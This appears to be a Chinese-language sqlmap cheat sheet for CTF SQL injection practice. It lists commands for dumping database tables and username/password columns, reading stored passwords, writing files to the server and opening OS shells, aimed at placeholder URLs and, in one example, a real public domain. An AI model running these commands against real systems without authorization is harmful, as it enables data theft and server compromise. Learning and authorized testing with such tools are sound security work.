ctf sql盲注python脚本 sqlmap盲注命令

sqlmap简介

 

sqlmap支持五种不同的注入模式：

 

1. 基于布尔的盲注，即可以根据返回页面判断条件真假的注入。
2. 基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。
3. 基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。
4. 联合查询注入，可以使用union的情况下的注入。
5. 堆查询注入，可以同时执行多条语句的执行时的注入。

 

基本格式

sqlmap -u “http://www.target.com/post.php?id=1”　　　　默认使用level1检测全部数据库类型
 
sqlmap -u “http://www.target.com/post.php?id=1”  --dbms mysql --level 3   --risk 3　　指定数据库类型为mysql，级别为3（共5级，级别越高，检测越全面）

cookie注入

 

当程序有防get注入的时候，可以使用cookie注入

sqlmap -u “http://www.baidu.com/shownews.asp” --cookie “id=11” --level 2（只有level达到2才会检测cookie）

从post数据包中注入

 

可以使用burpsuite或者temperdata等工具来抓取post包

 

sqlmap -r “c:\tools\request.txt” -p “username” --dbms mysql    指定username参数

获取数据库基本信息

 

sqlmap -u “http://www.target.com/post.php?id=1”  --dbms mysql --level 3 --dbs	　　	查询有哪些数据库
 
sqlmap -u “http://www.target.com/post.php?id=1”  --dbms mysql --level 3 -D test --tables	　　查询test数据库中有哪些表
 
sqlmap -u “http://www.target.com/post.php?id=1”  --dbms mysql --level 3 -D test -T admin --columns	　　查询test数据库中admin表有哪些字段
 
sqlmap -u “http://www.target.com/post.php?id=1”  --dbms mysql --level 3 -D test -T admin -C “username,password” --dump	　　	dump出字段username与password中的数据

其他命令

 

--is-dba 　　　　当前用户权限（是否为root权限）

--dbs 　　　　　　所有数据库

--current-db 　　　　网站当前数据库

--users 　　　　所有数据库用户

--current-user 　　当前数据库用户

--random-agent 　　　　构造随机user-agent

--passwords 　　　　数据库密码

--proxy http://local:8080 --threads 10　　(可以自定义线程加速) 代理

--time-sec=TIMESEC DBMS　　　　响应的延迟时间（默认为5秒）

--batch　　　　　　自动选择

--roles 　　　　列出数据库管理员角色

--sql-shell 　　　　运行自定义的sql语句

--os-cmd、--os-shell 　　　　运行任意操作系统命令

--file-read 　　　　从数据库服务器中读取文件

–file-write –file-dest 　　　　上传文件到数据库服务器中

-v 　　　　是sqlmap详细输出级别 等级3会显示payload

--hostname　　查看目标主机名

--delay 1(1秒)   表示延时1秒进行注入，1可根据自己情况更改

--force-ssl  　　制使用 SSL，在测试 HTTPS 的网站时推荐使用该参数，可能会测出未加该参数时测不出的注入

--level　　检测级别，共有1~5共5级，默认为1　　检测级别不仅会影响 payload 的使用，还会影响注入点的检测（GET 和 POST 参数是一直会被检测的）

以下是检测级别的特殊检测项

level >= 2时会检测cookie是否有注入
level >= 3时会检测User-Agent和Referer是否有注入
level >= 5时会检测Host是否存在注入漏洞
level设置还会影响union注入时检测的列数等

--risk　　风险等级，共有1~4共四级，默认为1,不推荐使用 risk >= 3的风险等级，存在修改表数据的风险因为风险等级2添加了基于时间的注入测试，等级3添加了 OR 测试。若注入点是在 UPDATE 语句中，使用 OR 测试可能会修改整个表的数据

--all　　　　使用这一个参数就能列举所有可访问的数据。但不推荐使用，因为这会发送大量请求，把有用和无用的信息都列举出来。

--banner　　列举数据库管理系统的版本号和最后的补丁级别以及底层的操作系统信息，命令如下